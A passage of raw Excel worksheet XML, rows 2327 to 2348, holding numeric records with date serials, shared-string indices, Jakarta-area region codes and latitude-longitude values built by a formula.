        <v>32</v>
      </c>
      <c r="T2327" t="s">
        <v>33</v>
      </c>
      <c r="U2327" s="5">
        <v>10678104</v>
      </c>
      <c r="V2327" s="5" t="s">
        <v>16525</v>
      </c>
      <c r="W2327" s="5">
        <v>-617421</v>
      </c>
      <c r="X2327" t="s">
        <v>20269</v>
      </c>
      <c r="Y2327" t="str">
        <f t="shared" si="36"/>
        <v>-6.17421,106.78104</v>
      </c>
    </row>
    <row r="2328" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2328">
        <v>201182</v>
      </c>
      <c r="B2328" s="1">
        <v>44095</v>
      </c>
      <c r="C2328" s="2">
        <v>0.59269675925925924</v>
      </c>
      <c r="D2328" t="s">
        <v>22</v>
      </c>
      <c r="E2328" t="s">
        <v>23</v>
      </c>
      <c r="F2328" t="s">
        <v>7848</v>
      </c>
      <c r="G2328" t="s">
        <v>7849</v>
      </c>
      <c r="H2328" t="s">
        <v>26</v>
      </c>
      <c r="I2328" t="s">
        <v>137</v>
      </c>
      <c r="J2328" t="s">
        <v>3135</v>
      </c>
      <c r="L2328" t="s">
        <v>7850</v>
      </c>
      <c r="M2328">
        <v>3674070004</v>
      </c>
      <c r="N2328">
        <v>3674070</v>
      </c>
      <c r="O2328">
        <v>3674</v>
      </c>
      <c r="P2328">
        <v>36</v>
      </c>
      <c r="Q2328" t="s">
        <v>7851</v>
      </c>
      <c r="R2328" t="s">
        <v>707</v>
      </c>
      <c r="S2328" t="s">
        <v>170</v>
      </c>
      <c r="T2328" t="s">
        <v>171</v>
      </c>
      <c r="U2328" s="5">
        <v>10667641</v>
      </c>
      <c r="V2328" s="5" t="s">
        <v>16526</v>
      </c>
      <c r="W2328" s="5">
        <v>-625463</v>
      </c>
      <c r="X2328" t="s">
        <v>20270</v>
      </c>
      <c r="Y2328" t="str">
        <f t="shared" si="36"/>
        <v>-6.25463,106.67641</v>
      </c>
    </row>
    <row r="2329" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2329">
        <v>201188</v>
      </c>
      <c r="B2329" s="1">
        <v>44095</v>
      </c>
      <c r="C2329" s="2">
        <v>0.59513888888888888</v>
      </c>
      <c r="D2329" t="s">
        <v>22</v>
      </c>
      <c r="E2329" t="s">
        <v>23</v>
      </c>
      <c r="F2329" t="s">
        <v>7852</v>
      </c>
      <c r="G2329" t="s">
        <v>7853</v>
      </c>
      <c r="H2329" t="s">
        <v>26</v>
      </c>
      <c r="I2329" t="s">
        <v>137</v>
      </c>
      <c r="J2329" t="s">
        <v>7854</v>
      </c>
      <c r="L2329" t="s">
        <v>7855</v>
      </c>
      <c r="M2329">
        <v>3174020001</v>
      </c>
      <c r="N2329">
        <v>3174020</v>
      </c>
      <c r="O2329">
        <v>3174</v>
      </c>
      <c r="P2329">
        <v>31</v>
      </c>
      <c r="Q2329" t="s">
        <v>2191</v>
      </c>
      <c r="R2329" t="s">
        <v>31</v>
      </c>
      <c r="S2329" t="s">
        <v>32</v>
      </c>
      <c r="T2329" t="s">
        <v>33</v>
      </c>
      <c r="U2329" s="5">
        <v>10676758</v>
      </c>
      <c r="V2329" s="5" t="s">
        <v>16527</v>
      </c>
      <c r="W2329" s="5">
        <v>-621819</v>
      </c>
      <c r="X2329" t="s">
        <v>20271</v>
      </c>
      <c r="Y2329" t="str">
        <f t="shared" si="36"/>
        <v>-6.21819,106.76758</v>
      </c>
    </row>
    <row r="2330" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2330">
        <v>201201</v>
      </c>
      <c r="B2330" s="1">
        <v>44095</v>
      </c>
      <c r="C2330" s="2">
        <v>0.6020833333333333</v>
      </c>
      <c r="D2330" t="s">
        <v>2648</v>
      </c>
      <c r="E2330" t="s">
        <v>23</v>
      </c>
      <c r="G2330" t="s">
        <v>7856</v>
      </c>
      <c r="H2330" t="s">
        <v>26</v>
      </c>
      <c r="J2330" t="s">
        <v>404</v>
      </c>
      <c r="L2330" t="s">
        <v>7857</v>
      </c>
      <c r="M2330">
        <v>3174020005</v>
      </c>
      <c r="N2330">
        <v>3174020</v>
      </c>
      <c r="O2330">
        <v>3174</v>
      </c>
      <c r="P2330">
        <v>31</v>
      </c>
      <c r="Q2330" t="s">
        <v>30</v>
      </c>
      <c r="R2330" t="s">
        <v>31</v>
      </c>
      <c r="S2330" t="s">
        <v>32</v>
      </c>
      <c r="T2330" t="s">
        <v>33</v>
      </c>
      <c r="U2330" s="5">
        <v>10676923</v>
      </c>
      <c r="V2330" s="5" t="s">
        <v>16528</v>
      </c>
      <c r="W2330" s="5">
        <v>-616606</v>
      </c>
      <c r="X2330" t="s">
        <v>20272</v>
      </c>
      <c r="Y2330" t="str">
        <f t="shared" si="36"/>
        <v>-6.16606,106.76923</v>
      </c>
    </row>
    <row r="2331" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2331">
        <v>201224</v>
      </c>
      <c r="B2331" s="1">
        <v>44095</v>
      </c>
      <c r="C2331" s="2">
        <v>0.61805555555555558</v>
      </c>
      <c r="D2331" t="s">
        <v>2648</v>
      </c>
      <c r="E2331" t="s">
        <v>23</v>
      </c>
      <c r="G2331" t="s">
        <v>7858</v>
      </c>
      <c r="H2331" t="s">
        <v>26</v>
      </c>
      <c r="J2331" t="s">
        <v>7859</v>
      </c>
      <c r="L2331" t="s">
        <v>7860</v>
      </c>
      <c r="M2331">
        <v>3171040005</v>
      </c>
      <c r="N2331">
        <v>3171040</v>
      </c>
      <c r="O2331">
        <v>3171</v>
      </c>
      <c r="P2331">
        <v>31</v>
      </c>
      <c r="Q2331" t="s">
        <v>1283</v>
      </c>
      <c r="R2331" t="s">
        <v>163</v>
      </c>
      <c r="S2331" t="s">
        <v>108</v>
      </c>
      <c r="T2331" t="s">
        <v>33</v>
      </c>
      <c r="U2331" s="5">
        <v>10675394</v>
      </c>
      <c r="V2331" s="5" t="s">
        <v>16529</v>
      </c>
      <c r="W2331" s="5">
        <v>-622461</v>
      </c>
      <c r="X2331" t="s">
        <v>20273</v>
      </c>
      <c r="Y2331" t="str">
        <f t="shared" si="36"/>
        <v>-6.22461,106.75394</v>
      </c>
    </row>
    <row r="2332" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2332">
        <v>201230</v>
      </c>
      <c r="B2332" s="1">
        <v>44095</v>
      </c>
      <c r="C2332" s="2">
        <v>0.6208217592592592</v>
      </c>
      <c r="D2332" t="s">
        <v>22</v>
      </c>
      <c r="E2332" t="s">
        <v>23</v>
      </c>
      <c r="F2332" t="s">
        <v>7861</v>
      </c>
      <c r="G2332" t="s">
        <v>7862</v>
      </c>
      <c r="H2332" t="s">
        <v>26</v>
      </c>
      <c r="I2332" t="s">
        <v>1651</v>
      </c>
      <c r="J2332" t="s">
        <v>7863</v>
      </c>
      <c r="L2332" t="s">
        <v>7864</v>
      </c>
      <c r="M2332">
        <v>3174030003</v>
      </c>
      <c r="N2332">
        <v>3174030</v>
      </c>
      <c r="O2332">
        <v>3174</v>
      </c>
      <c r="P2332">
        <v>31</v>
      </c>
      <c r="Q2332" t="s">
        <v>1486</v>
      </c>
      <c r="R2332" t="s">
        <v>1487</v>
      </c>
      <c r="S2332" t="s">
        <v>32</v>
      </c>
      <c r="T2332" t="s">
        <v>33</v>
      </c>
      <c r="U2332" s="5">
        <v>10679312</v>
      </c>
      <c r="V2332" s="5" t="s">
        <v>16530</v>
      </c>
      <c r="W2332" s="5">
        <v>-619190</v>
      </c>
      <c r="X2332" t="s">
        <v>20274</v>
      </c>
      <c r="Y2332" t="str">
        <f t="shared" si="36"/>
        <v>-6.19190,106.79312</v>
      </c>
    </row>
    <row r="2333" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2333">
        <v>201266</v>
      </c>
      <c r="B2333" s="1">
        <v>44095</v>
      </c>
      <c r="C2333" s="2">
        <v>0.63876157407407408</v>
      </c>
      <c r="D2333" t="s">
        <v>22</v>
      </c>
      <c r="E2333" t="s">
        <v>23</v>
      </c>
      <c r="F2333" t="s">
        <v>7865</v>
      </c>
      <c r="G2333" t="s">
        <v>7866</v>
      </c>
      <c r="H2333" t="s">
        <v>26</v>
      </c>
      <c r="I2333" t="s">
        <v>1099</v>
      </c>
      <c r="J2333" t="s">
        <v>7867</v>
      </c>
      <c r="L2333" t="s">
        <v>7868</v>
      </c>
      <c r="M2333">
        <v>3174070004</v>
      </c>
      <c r="N2333">
        <v>3174070</v>
      </c>
      <c r="O2333">
        <v>3174</v>
      </c>
      <c r="P2333">
        <v>31</v>
      </c>
      <c r="Q2333" t="s">
        <v>926</v>
      </c>
      <c r="R2333" t="s">
        <v>84</v>
      </c>
      <c r="S2333" t="s">
        <v>32</v>
      </c>
      <c r="T2333" t="s">
        <v>33</v>
      </c>
      <c r="U2333" s="5">
        <v>10675651</v>
      </c>
      <c r="V2333" s="5" t="s">
        <v>16531</v>
      </c>
      <c r="W2333" s="5">
        <v>-613678</v>
      </c>
      <c r="X2333" t="s">
        <v>18508</v>
      </c>
      <c r="Y2333" t="str">
        <f t="shared" si="36"/>
        <v>-6.13678,106.75651</v>
      </c>
    </row>
    <row r="2334" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2334">
        <v>201313</v>
      </c>
      <c r="B2334" s="1">
        <v>44095</v>
      </c>
      <c r="C2334" s="2">
        <v>0.66015046296296298</v>
      </c>
      <c r="D2334" t="s">
        <v>22</v>
      </c>
      <c r="E2334" t="s">
        <v>23</v>
      </c>
      <c r="F2334" t="s">
        <v>7869</v>
      </c>
      <c r="G2334" t="s">
        <v>7870</v>
      </c>
      <c r="H2334" t="s">
        <v>26</v>
      </c>
      <c r="I2334" t="s">
        <v>1447</v>
      </c>
      <c r="J2334" t="s">
        <v>7871</v>
      </c>
      <c r="L2334" t="s">
        <v>7872</v>
      </c>
      <c r="M2334">
        <v>3174070001</v>
      </c>
      <c r="N2334">
        <v>3174070</v>
      </c>
      <c r="O2334">
        <v>3174</v>
      </c>
      <c r="P2334">
        <v>31</v>
      </c>
      <c r="Q2334" t="s">
        <v>83</v>
      </c>
      <c r="R2334" t="s">
        <v>84</v>
      </c>
      <c r="S2334" t="s">
        <v>32</v>
      </c>
      <c r="T2334" t="s">
        <v>33</v>
      </c>
      <c r="U2334" s="5">
        <v>10671573</v>
      </c>
      <c r="V2334" s="5" t="s">
        <v>16532</v>
      </c>
      <c r="W2334" s="5">
        <v>-618191</v>
      </c>
      <c r="X2334" t="s">
        <v>20275</v>
      </c>
      <c r="Y2334" t="str">
        <f t="shared" si="36"/>
        <v>-6.18191,106.71573</v>
      </c>
    </row>
    <row r="2335" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2335">
        <v>201335</v>
      </c>
      <c r="B2335" s="1">
        <v>44095</v>
      </c>
      <c r="C2335" s="2">
        <v>0.62668981481481478</v>
      </c>
      <c r="D2335" t="s">
        <v>85</v>
      </c>
      <c r="E2335" t="s">
        <v>23</v>
      </c>
      <c r="F2335" t="s">
        <v>7873</v>
      </c>
      <c r="G2335" t="s">
        <v>7874</v>
      </c>
      <c r="H2335" t="s">
        <v>26</v>
      </c>
      <c r="J2335" t="s">
        <v>7854</v>
      </c>
      <c r="K2335" t="s">
        <v>7875</v>
      </c>
      <c r="L2335" t="s">
        <v>7876</v>
      </c>
      <c r="M2335">
        <v>3174020001</v>
      </c>
      <c r="N2335">
        <v>3174020</v>
      </c>
      <c r="O2335">
        <v>3174</v>
      </c>
      <c r="P2335">
        <v>31</v>
      </c>
      <c r="Q2335" t="s">
        <v>2191</v>
      </c>
      <c r="R2335" t="s">
        <v>31</v>
      </c>
      <c r="S2335" t="s">
        <v>32</v>
      </c>
      <c r="T2335" t="s">
        <v>33</v>
      </c>
      <c r="U2335" s="5">
        <v>10676512</v>
      </c>
      <c r="V2335" s="5" t="s">
        <v>16533</v>
      </c>
      <c r="W2335" s="5">
        <v>-621695</v>
      </c>
      <c r="X2335" t="s">
        <v>20276</v>
      </c>
      <c r="Y2335" t="str">
        <f t="shared" si="36"/>
        <v>-6.21695,106.76512</v>
      </c>
    </row>
    <row r="2336" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2336">
        <v>201350</v>
      </c>
      <c r="B2336" s="1">
        <v>44095</v>
      </c>
      <c r="C2336" s="2">
        <v>0.67583333333333329</v>
      </c>
      <c r="D2336" t="s">
        <v>22</v>
      </c>
      <c r="E2336" t="s">
        <v>23</v>
      </c>
      <c r="F2336" t="s">
        <v>7877</v>
      </c>
      <c r="G2336" t="s">
        <v>7878</v>
      </c>
      <c r="H2336" t="s">
        <v>26</v>
      </c>
      <c r="I2336" t="s">
        <v>1670</v>
      </c>
      <c r="J2336" t="s">
        <v>7879</v>
      </c>
      <c r="L2336" t="s">
        <v>7880</v>
      </c>
      <c r="M2336">
        <v>3174070005</v>
      </c>
      <c r="N2336">
        <v>3174070</v>
      </c>
      <c r="O2336">
        <v>3174</v>
      </c>
      <c r="P2336">
        <v>31</v>
      </c>
      <c r="Q2336" t="s">
        <v>568</v>
      </c>
      <c r="R2336" t="s">
        <v>84</v>
      </c>
      <c r="S2336" t="s">
        <v>32</v>
      </c>
      <c r="T2336" t="s">
        <v>33</v>
      </c>
      <c r="U2336" s="5">
        <v>10673438</v>
      </c>
      <c r="V2336" s="5" t="s">
        <v>16534</v>
      </c>
      <c r="W2336" s="5">
        <v>-615087</v>
      </c>
      <c r="X2336" t="s">
        <v>20277</v>
      </c>
      <c r="Y2336" t="str">
        <f t="shared" si="36"/>
        <v>-6.15087,106.73438</v>
      </c>
    </row>
    <row r="2337" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2337">
        <v>201365</v>
      </c>
      <c r="B2337" s="1">
        <v>44095</v>
      </c>
      <c r="C2337" s="2">
        <v>0.68326388888888889</v>
      </c>
      <c r="D2337" t="s">
        <v>22</v>
      </c>
      <c r="E2337" t="s">
        <v>23</v>
      </c>
      <c r="F2337" t="s">
        <v>7881</v>
      </c>
      <c r="G2337" t="s">
        <v>7882</v>
      </c>
      <c r="H2337" t="s">
        <v>26</v>
      </c>
      <c r="I2337" t="s">
        <v>1046</v>
      </c>
      <c r="J2337" t="s">
        <v>7883</v>
      </c>
      <c r="L2337" t="s">
        <v>7884</v>
      </c>
      <c r="M2337">
        <v>3174010005</v>
      </c>
      <c r="N2337">
        <v>3174010</v>
      </c>
      <c r="O2337">
        <v>3174</v>
      </c>
      <c r="P2337">
        <v>31</v>
      </c>
      <c r="Q2337" t="s">
        <v>251</v>
      </c>
      <c r="R2337" t="s">
        <v>69</v>
      </c>
      <c r="S2337" t="s">
        <v>32</v>
      </c>
      <c r="T2337" t="s">
        <v>33</v>
      </c>
      <c r="U2337" s="5">
        <v>10674630</v>
      </c>
      <c r="V2337" s="5" t="s">
        <v>16535</v>
      </c>
      <c r="W2337" s="5">
        <v>-618349</v>
      </c>
      <c r="X2337" t="s">
        <v>20278</v>
      </c>
      <c r="Y2337" t="str">
        <f t="shared" si="36"/>
        <v>-6.18349,106.74630</v>
      </c>
    </row>
    <row r="2338" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2338">
        <v>201387</v>
      </c>
      <c r="B2338" s="1">
        <v>44095</v>
      </c>
      <c r="C2338" s="2">
        <v>0.69278935185185186</v>
      </c>
      <c r="D2338" t="s">
        <v>22</v>
      </c>
      <c r="E2338" t="s">
        <v>23</v>
      </c>
      <c r="F2338" t="s">
        <v>7885</v>
      </c>
      <c r="G2338" t="s">
        <v>7886</v>
      </c>
      <c r="H2338" t="s">
        <v>26</v>
      </c>
      <c r="I2338" t="s">
        <v>1055</v>
      </c>
      <c r="J2338" t="s">
        <v>7887</v>
      </c>
      <c r="L2338" t="s">
        <v>7888</v>
      </c>
      <c r="M2338">
        <v>3174020007</v>
      </c>
      <c r="N2338">
        <v>3174020</v>
      </c>
      <c r="O2338">
        <v>3174</v>
      </c>
      <c r="P2338">
        <v>31</v>
      </c>
      <c r="Q2338" t="s">
        <v>95</v>
      </c>
      <c r="R2338" t="s">
        <v>31</v>
      </c>
      <c r="S2338" t="s">
        <v>32</v>
      </c>
      <c r="T2338" t="s">
        <v>33</v>
      </c>
      <c r="U2338" s="5">
        <v>10676296</v>
      </c>
      <c r="V2338" s="5" t="s">
        <v>16536</v>
      </c>
      <c r="W2338" s="5">
        <v>-616561</v>
      </c>
      <c r="X2338" t="s">
        <v>20279</v>
      </c>
      <c r="Y2338" t="str">
        <f t="shared" si="36"/>
        <v>-6.16561,106.76296</v>
      </c>
    </row>
    <row r="2339" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2339">
        <v>201395</v>
      </c>
      <c r="B2339" s="1">
        <v>44095</v>
      </c>
      <c r="C2339" s="2">
        <v>0.69594907407407414</v>
      </c>
      <c r="D2339" t="s">
        <v>22</v>
      </c>
      <c r="E2339" t="s">
        <v>23</v>
      </c>
      <c r="F2339" t="s">
        <v>7889</v>
      </c>
      <c r="G2339" t="s">
        <v>7890</v>
      </c>
      <c r="H2339" t="s">
        <v>26</v>
      </c>
      <c r="I2339" t="s">
        <v>1633</v>
      </c>
      <c r="J2339" t="s">
        <v>374</v>
      </c>
      <c r="L2339" t="s">
        <v>7891</v>
      </c>
      <c r="M2339">
        <v>3174040005</v>
      </c>
      <c r="N2339">
        <v>3174040</v>
      </c>
      <c r="O2339">
        <v>3174</v>
      </c>
      <c r="P2339">
        <v>31</v>
      </c>
      <c r="Q2339" t="s">
        <v>376</v>
      </c>
      <c r="R2339" t="s">
        <v>377</v>
      </c>
      <c r="S2339" t="s">
        <v>32</v>
      </c>
      <c r="T2339" t="s">
        <v>33</v>
      </c>
      <c r="U2339" s="5">
        <v>10678736</v>
      </c>
      <c r="V2339" s="5" t="s">
        <v>16537</v>
      </c>
      <c r="W2339" s="5">
        <v>-616653</v>
      </c>
      <c r="X2339" t="s">
        <v>20280</v>
      </c>
      <c r="Y2339" t="str">
        <f t="shared" si="36"/>
        <v>-6.16653,106.78736</v>
      </c>
    </row>
    <row r="2340" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2340">
        <v>201451</v>
      </c>
      <c r="B2340" s="1">
        <v>44095</v>
      </c>
      <c r="C2340" s="2">
        <v>0.72291666666666676</v>
      </c>
      <c r="D2340" t="s">
        <v>2648</v>
      </c>
      <c r="E2340" t="s">
        <v>23</v>
      </c>
      <c r="G2340" t="s">
        <v>7892</v>
      </c>
      <c r="H2340" t="s">
        <v>26</v>
      </c>
      <c r="J2340" t="s">
        <v>404</v>
      </c>
      <c r="L2340" t="s">
        <v>7893</v>
      </c>
      <c r="M2340">
        <v>3174020005</v>
      </c>
      <c r="N2340">
        <v>3174020</v>
      </c>
      <c r="O2340">
        <v>3174</v>
      </c>
      <c r="P2340">
        <v>31</v>
      </c>
      <c r="Q2340" t="s">
        <v>30</v>
      </c>
      <c r="R2340" t="s">
        <v>31</v>
      </c>
      <c r="S2340" t="s">
        <v>32</v>
      </c>
      <c r="T2340" t="s">
        <v>33</v>
      </c>
      <c r="U2340" s="5">
        <v>10676923</v>
      </c>
      <c r="V2340" s="5" t="s">
        <v>16528</v>
      </c>
      <c r="W2340" s="5">
        <v>-616607</v>
      </c>
      <c r="X2340" t="s">
        <v>20281</v>
      </c>
      <c r="Y2340" t="str">
        <f t="shared" si="36"/>
        <v>-6.16607,106.76923</v>
      </c>
    </row>
    <row r="2341" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2341">
        <v>201469</v>
      </c>
      <c r="B2341" s="1">
        <v>44095</v>
      </c>
      <c r="C2341" s="2">
        <v>0.73243055555555558</v>
      </c>
      <c r="D2341" t="s">
        <v>22</v>
      </c>
      <c r="E2341" t="s">
        <v>23</v>
      </c>
      <c r="F2341" t="s">
        <v>7894</v>
      </c>
      <c r="H2341" t="s">
        <v>26</v>
      </c>
      <c r="I2341" t="s">
        <v>4350</v>
      </c>
      <c r="J2341" t="s">
        <v>648</v>
      </c>
      <c r="L2341" t="s">
        <v>7895</v>
      </c>
      <c r="M2341">
        <v>3174020005</v>
      </c>
      <c r="N2341">
        <v>3174020</v>
      </c>
      <c r="O2341">
        <v>3174</v>
      </c>
      <c r="P2341">
        <v>31</v>
      </c>
      <c r="Q2341" t="s">
        <v>30</v>
      </c>
      <c r="R2341" t="s">
        <v>31</v>
      </c>
      <c r="S2341" t="s">
        <v>32</v>
      </c>
      <c r="T2341" t="s">
        <v>33</v>
      </c>
      <c r="U2341" s="5">
        <v>10677580</v>
      </c>
      <c r="V2341" s="5" t="s">
        <v>16538</v>
      </c>
      <c r="W2341" s="5">
        <v>-617078</v>
      </c>
      <c r="X2341" t="s">
        <v>20282</v>
      </c>
      <c r="Y2341" t="str">
        <f t="shared" si="36"/>
        <v>-6.17078,106.77580</v>
      </c>
    </row>
    <row r="2342" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2342">
        <v>201470</v>
      </c>
      <c r="B2342" s="1">
        <v>44095</v>
      </c>
      <c r="C2342" s="2">
        <v>0.7336921296296296</v>
      </c>
      <c r="D2342" t="s">
        <v>22</v>
      </c>
      <c r="E2342" t="s">
        <v>23</v>
      </c>
      <c r="F2342" t="s">
        <v>7896</v>
      </c>
      <c r="H2342" t="s">
        <v>26</v>
      </c>
      <c r="I2342" t="s">
        <v>65</v>
      </c>
      <c r="J2342" t="s">
        <v>648</v>
      </c>
      <c r="L2342" t="s">
        <v>7897</v>
      </c>
      <c r="M2342">
        <v>3174020005</v>
      </c>
      <c r="N2342">
        <v>3174020</v>
      </c>
      <c r="O2342">
        <v>3174</v>
      </c>
      <c r="P2342">
        <v>31</v>
      </c>
      <c r="Q2342" t="s">
        <v>30</v>
      </c>
      <c r="R2342" t="s">
        <v>31</v>
      </c>
      <c r="S2342" t="s">
        <v>32</v>
      </c>
      <c r="T2342" t="s">
        <v>33</v>
      </c>
      <c r="U2342" s="5">
        <v>10677873</v>
      </c>
      <c r="V2342" s="5" t="s">
        <v>16539</v>
      </c>
      <c r="W2342" s="5">
        <v>-617389</v>
      </c>
      <c r="X2342" t="s">
        <v>20283</v>
      </c>
      <c r="Y2342" t="str">
        <f t="shared" si="36"/>
        <v>-6.17389,106.77873</v>
      </c>
    </row>
    <row r="2343" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2343">
        <v>201479</v>
      </c>
      <c r="B2343" s="1">
        <v>44095</v>
      </c>
      <c r="C2343" s="2">
        <v>0.73555555555555552</v>
      </c>
      <c r="D2343" t="s">
        <v>22</v>
      </c>
      <c r="E2343" t="s">
        <v>23</v>
      </c>
      <c r="F2343" t="s">
        <v>7898</v>
      </c>
      <c r="H2343" t="s">
        <v>26</v>
      </c>
      <c r="I2343" t="s">
        <v>2300</v>
      </c>
      <c r="J2343" t="s">
        <v>444</v>
      </c>
      <c r="L2343" t="s">
        <v>7899</v>
      </c>
      <c r="M2343">
        <v>3174020005</v>
      </c>
      <c r="N2343">
        <v>3174020</v>
      </c>
      <c r="O2343">
        <v>3174</v>
      </c>
      <c r="P2343">
        <v>31</v>
      </c>
      <c r="Q2343" t="s">
        <v>30</v>
      </c>
      <c r="R2343" t="s">
        <v>31</v>
      </c>
      <c r="S2343" t="s">
        <v>32</v>
      </c>
      <c r="T2343" t="s">
        <v>33</v>
      </c>
      <c r="U2343" s="5">
        <v>10677883</v>
      </c>
      <c r="V2343" s="5" t="s">
        <v>16540</v>
      </c>
      <c r="W2343" s="5">
        <v>-617405</v>
      </c>
      <c r="X2343" t="s">
        <v>20284</v>
      </c>
      <c r="Y2343" t="str">
        <f t="shared" si="36"/>
        <v>-6.17405,106.77883</v>
      </c>
    </row>
    <row r="2344" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2344">
        <v>201488</v>
      </c>
      <c r="B2344" s="1">
        <v>44095</v>
      </c>
      <c r="C2344" s="2">
        <v>0.73843749999999997</v>
      </c>
      <c r="D2344" t="s">
        <v>22</v>
      </c>
      <c r="E2344" t="s">
        <v>23</v>
      </c>
      <c r="F2344" t="s">
        <v>7900</v>
      </c>
      <c r="G2344" t="s">
        <v>7901</v>
      </c>
      <c r="H2344" t="s">
        <v>26</v>
      </c>
      <c r="I2344" t="s">
        <v>1340</v>
      </c>
      <c r="J2344" t="s">
        <v>5936</v>
      </c>
      <c r="L2344" t="s">
        <v>7902</v>
      </c>
      <c r="M2344">
        <v>3174030003</v>
      </c>
      <c r="N2344">
        <v>3174030</v>
      </c>
      <c r="O2344">
        <v>3174</v>
      </c>
      <c r="P2344">
        <v>31</v>
      </c>
      <c r="Q2344" t="s">
        <v>1486</v>
      </c>
      <c r="R2344" t="s">
        <v>1487</v>
      </c>
      <c r="S2344" t="s">
        <v>32</v>
      </c>
      <c r="T2344" t="s">
        <v>33</v>
      </c>
      <c r="U2344" s="5">
        <v>10678667</v>
      </c>
      <c r="V2344" s="5" t="s">
        <v>16541</v>
      </c>
      <c r="W2344" s="5">
        <v>-618677</v>
      </c>
      <c r="X2344" t="s">
        <v>20285</v>
      </c>
      <c r="Y2344" t="str">
        <f t="shared" si="36"/>
        <v>-6.18677,106.78667</v>
      </c>
    </row>
    <row r="2345" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2345">
        <v>201491</v>
      </c>
      <c r="B2345" s="1">
        <v>44095</v>
      </c>
      <c r="C2345" s="2">
        <v>0.7368055555555556</v>
      </c>
      <c r="D2345" t="s">
        <v>2648</v>
      </c>
      <c r="E2345" t="s">
        <v>23</v>
      </c>
      <c r="G2345" t="s">
        <v>7903</v>
      </c>
      <c r="H2345" t="s">
        <v>26</v>
      </c>
      <c r="J2345" t="s">
        <v>2785</v>
      </c>
      <c r="L2345" t="s">
        <v>7904</v>
      </c>
      <c r="M2345">
        <v>3174040005</v>
      </c>
      <c r="N2345">
        <v>3174040</v>
      </c>
      <c r="O2345">
        <v>3174</v>
      </c>
      <c r="P2345">
        <v>31</v>
      </c>
      <c r="Q2345" t="s">
        <v>376</v>
      </c>
      <c r="R2345" t="s">
        <v>377</v>
      </c>
      <c r="S2345" t="s">
        <v>32</v>
      </c>
      <c r="T2345" t="s">
        <v>33</v>
      </c>
      <c r="U2345" s="5">
        <v>10678985</v>
      </c>
      <c r="V2345" s="5" t="s">
        <v>16542</v>
      </c>
      <c r="W2345" s="5">
        <v>-616201</v>
      </c>
      <c r="X2345" t="s">
        <v>19174</v>
      </c>
      <c r="Y2345" t="str">
        <f t="shared" si="36"/>
        <v>-6.16201,106.78985</v>
      </c>
    </row>
    <row r="2346" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2346">
        <v>201498</v>
      </c>
      <c r="B2346" s="1">
        <v>44095</v>
      </c>
      <c r="C2346" s="2">
        <v>0.74134259259259261</v>
      </c>
      <c r="D2346" t="s">
        <v>22</v>
      </c>
      <c r="E2346" t="s">
        <v>23</v>
      </c>
      <c r="F2346" t="s">
        <v>7905</v>
      </c>
      <c r="H2346" t="s">
        <v>26</v>
      </c>
      <c r="I2346" t="s">
        <v>271</v>
      </c>
      <c r="J2346" t="s">
        <v>648</v>
      </c>
      <c r="L2346" t="s">
        <v>7906</v>
      </c>
      <c r="M2346">
        <v>3174020005</v>
      </c>
      <c r="N2346">
        <v>3174020</v>
      </c>
      <c r="O2346">
        <v>3174</v>
      </c>
      <c r="P2346">
        <v>31</v>
      </c>
      <c r="Q2346" t="s">
        <v>30</v>
      </c>
      <c r="R2346" t="s">
        <v>31</v>
      </c>
      <c r="S2346" t="s">
        <v>32</v>
      </c>
      <c r="T2346" t="s">
        <v>33</v>
      </c>
      <c r="U2346" s="5">
        <v>10677766</v>
      </c>
      <c r="V2346" s="5" t="s">
        <v>16543</v>
      </c>
      <c r="W2346" s="5">
        <v>-617339</v>
      </c>
      <c r="X2346" t="s">
        <v>20286</v>
      </c>
      <c r="Y2346" t="str">
        <f t="shared" si="36"/>
        <v>-6.17339,106.77766</v>
      </c>
    </row>
    <row r="2347" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2347">
        <v>201508</v>
      </c>
      <c r="B2347" s="1">
        <v>44095</v>
      </c>
      <c r="C2347" s="2">
        <v>0.74543981481481481</v>
      </c>
      <c r="D2347" t="s">
        <v>22</v>
      </c>
      <c r="E2347" t="s">
        <v>23</v>
      </c>
      <c r="F2347" t="s">
        <v>7907</v>
      </c>
      <c r="H2347" t="s">
        <v>26</v>
      </c>
      <c r="I2347" t="s">
        <v>517</v>
      </c>
      <c r="J2347" t="s">
        <v>7908</v>
      </c>
      <c r="L2347" t="s">
        <v>7909</v>
      </c>
      <c r="M2347">
        <v>3172060001</v>
      </c>
      <c r="N2347">
        <v>3172060</v>
      </c>
      <c r="O2347">
        <v>3172</v>
      </c>
      <c r="P2347">
        <v>31</v>
      </c>
      <c r="Q2347" t="s">
        <v>309</v>
      </c>
      <c r="R2347" t="s">
        <v>48</v>
      </c>
      <c r="S2347" t="s">
        <v>49</v>
      </c>
      <c r="T2347" t="s">
        <v>33</v>
      </c>
      <c r="U2347" s="5">
        <v>10686809</v>
      </c>
      <c r="V2347" s="5" t="s">
        <v>16544</v>
      </c>
      <c r="W2347" s="5">
        <v>-623475</v>
      </c>
      <c r="X2347" t="s">
        <v>20287</v>
      </c>
      <c r="Y2347" t="str">
        <f t="shared" si="36"/>
        <v>-6.23475,106.86809</v>
      </c>
    </row>
    <row r="2348" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2348">
        <v>201645</v>
      </c>
      <c r="B2348" s="1">
        <v>44095</v>
      </c>
      <c r="C2348" s="2">
        <v>0.79744212962962957</v>
      </c>
      <c r="D2348" t="s">
        <v>22</v>
      </c>
      <c r="E2348" t="s">
        <v>23</v>
      </c>
      <c r="F2348" t="s">
        <v>7910</v>
      </c>
      <c r="G2348" t="s">
        <v>7911</v>
      </c>
      <c r="H2348" t="s">
        <v>26</v>
      </c>
